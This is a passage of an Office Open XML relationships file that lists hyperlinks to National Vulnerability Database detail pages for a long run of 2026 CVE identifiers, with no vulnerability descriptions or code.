Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92501" TargetMode="External" Id="rId829" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92502" TargetMode="External" Id="rId830" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92503" TargetMode="External" Id="rId831" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92504" TargetMode="External" Id="rId832" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92505" TargetMode="External" Id="rId833" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92506" TargetMode="External" Id="rId834" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92507" TargetMode="External" Id="rId835" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92508" TargetMode="External" Id="rId836" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92509" TargetMode="External" Id="rId837" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92510" TargetMode="External" Id="rId838" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92511" TargetMode="External" Id="rId839" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92512" TargetMode="External" Id="rId840" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92513" TargetMode="External" Id="rId841" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92514" TargetMode="External" Id="rId842" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92515" TargetMode="External" Id="rId843" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92516" TargetMode="External" Id="rId844" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92517" TargetMode="External" Id="rId845" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92518" TargetMode="External" Id="rId846" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92519" TargetMode="External" Id="rId847" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92520" TargetMode="External" Id="rId848" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92521" TargetMode="External" Id="rId849" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92522" TargetMode="External" Id="rId850" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92523" TargetMode="External" Id="rId851" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92524" TargetMode="External" Id="rId852" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92525" TargetMode="External" Id="rId853" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93037" TargetMode="External" Id="rId854" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93038" TargetMode="External" Id="rId855" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93039" TargetMode="External" Id="rId856" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93040" TargetMode="External" Id="rId857" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93041" TargetMode="External" Id="rId858" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93042" TargetMode="External" Id="rId859" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93043" TargetMode="External" Id="rId860" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93044" TargetMode="External" Id="rId861" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93045" TargetMode="External" Id="rId862" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93046" TargetMode="External" Id="rId863" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93047" TargetMode="External" Id="rId864" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93048" TargetMode="External" Id="rId865" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93049" TargetMode="External" Id="rId866" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93050" TargetMode="External" Id="rId867" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93051" TargetMode="External" Id="rId868" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93052" TargetMode="External" Id="rId869" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93053" TargetMode="External" Id="rId870" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93054" TargetMode="External" Id="rId871" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93055" TargetMode="External" Id="rId872" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93056" TargetMode="External" Id="rId873" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93057" TargetMode="External" Id="rId874" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93058" TargetMode="External" Id="rId875" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93059" TargetMode="External" Id="rId876" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93060" TargetMode="External" Id="rId877" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93061" TargetMode="External" Id="rId878" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93062" TargetMode="External" Id="rId879" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93063" TargetMode="External" Id="rId880" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93064" TargetMode="External" Id="rId881" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93065" TargetMode="External" Id="rId882" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93066" TargetMode="External" Id="rId883" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93067" TargetMode="External" Id="rId884" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93068" TargetMode="External" Id="rId885" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93069" TargetMode="External" Id="rId886" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93070" TargetMode="External" Id="rId887" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93071" TargetMode="External" Id="rId888" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93072" TargetMode="External" Id="rId889" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93073" TargetMode="External" Id="rId890" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93074" TargetMode="External" Id="rId891" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93075" TargetMode="External" Id="rId892" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93076" TargetMode="External" Id="rId893" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93077" TargetMode="External" Id="rId894" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93078" TargetMode="External" Id="rId895" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93079" TargetMode="External" Id="rId896" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93080" TargetMode="External" Id="rId897" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93081" TargetMode="External" Id="rId898" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93082" TargetMode="External" Id="rId899" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93083" TargetMode="External" Id="rId900" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93084" TargetMode="External" Id="rId901" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93085" TargetMode="External" Id="rId902" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93086" TargetMode="External" Id="rId903" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93089" TargetMode="External" Id="rId904" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93090" TargetMode="External" Id="rId905" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93091" TargetMode="External" Id="rId906" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93092" TargetMode="External" Id="rId907" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93093" TargetMode="External" Id="rId908" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93094" TargetMode="External" Id="rId909" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93095" TargetMode="External" Id="rId910" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93096" TargetMode="External" Id="rId911" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93097" TargetMode="External" Id="rId912" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93098" TargetMode="External" Id="rId913" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93099" TargetMode="External" Id="rId914" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93100" TargetMode="External" Id="rId915" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93101" TargetMode="External" Id="rId916" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93102" TargetMode="External" Id="rId917" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93103" TargetMode="External" Id="rId918" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93104" TargetMode="External" Id="rId919" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93105" TargetMode="External" Id="rId920" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93106" TargetMode="External" Id="rId921" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93107" TargetMode="External" Id="rId922" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93108" TargetMode="External" Id="rId923" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93109" TargetMode="External" Id="rId924" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93110" TargetMode="External" Id="rId925" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93111" TargetMode="External" Id="rId926" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93112" TargetMode="External" Id="rId927" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93113" TargetMode="External" Id="rId928" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93114" TargetMode="External" Id="rId929" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93115" TargetMode="External" Id="rId930" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93116" TargetMode="External" Id="rId931" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93117" TargetMode="External" Id="rId932" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93118" TargetMode="External" Id="rId933" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93119" TargetMode="External" Id="rId934" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93120" TargetMode="External" Id="rId935" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93121" TargetMode="External" Id="rId936" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93122" TargetMode="External" Id="rId937" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93123" TargetMode="External" Id="rId938" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93124" TargetMode="External" Id="rId939" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93125" TargetMode="External" Id="rId940" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93126" TargetMode="External" Id="rId941" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93127" TargetMode="External" Id="rId942" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93128" TargetMode="External" Id="rId943" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93129" TargetMode="External" Id="rId944" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93130" TargetMode="External" Id="rId945" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93131" TargetMode="External" Id="rId946" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93132" TargetMode="External" Id="rId947" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93133" TargetMode="External" Id="rId948" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93134" TargetMode="External" Id="rId949" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93135" TargetMode="External" Id="rId950" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93136" TargetMode="External" Id="rId951" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93137" TargetMode="External" Id="rId952" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93138" TargetMode="External" Id="rId953" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93139" TargetMode="External" Id="rId954" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-9314" TargetMode="External" Id="rId955" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93140" TargetMode="External" Id="rId956" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93141" TargetMode="External" Id="rId957" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93142" TargetMode="External" Id="rId958" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93143" TargetMode="External" Id="rId959" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93144" TargetMode="External" Id="rId960" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93145" TargetMode="External" Id="rId961" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93146" TargetMode="External" Id="rId962" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93147" TargetMode="External" Id="rId963" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93148" TargetMode="External" Id="rId964" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93149" TargetMode="External" Id="rId965" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93150" TargetMode="External" Id="rId966" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93151" TargetMode="External" Id="rId967" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93152" TargetMode="External" Id="rId968" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93153" TargetMode="External" Id="rId969" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93154" TargetMode="External" Id="rId970" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93155" TargetMode="External" Id="rId971" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93156" TargetMode="External" Id="rId972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93157" TargetMode="External" Id="rId973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93158" TargetMode="External" Id="rId974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93159" TargetMode="External" Id="rId975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93160" TargetMode="External" Id="rId976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93161" TargetMode="External" Id="rId977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93162" TargetMode="External" Id="rId978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93163" TargetMode="External" Id="rId979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93164" TargetMode="External" Id="rId980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93165" TargetMode="External" Id="rId981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93166" TargetMode="External" Id="rId982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93167" TargetMode="External" Id="rId983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93168" TargetMode="External" Id="rId984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93169" TargetMode="External" Id="rId985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93170" TargetMode="External" Id="rId986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93171" TargetMode="External" Id="rId987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93172" TargetMode="External" Id="rId988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93173" TargetMode="External" Id="rId989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93174" TargetMode="External" Id="rId990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93175" TargetMode="External" Id="rId991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93176" TargetMode="External" Id="rId992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93177" TargetMode="External" Id="rId993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93178" TargetMode="External" Id="rId994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93179" TargetMode="External" Id="rId995" /><Relationship 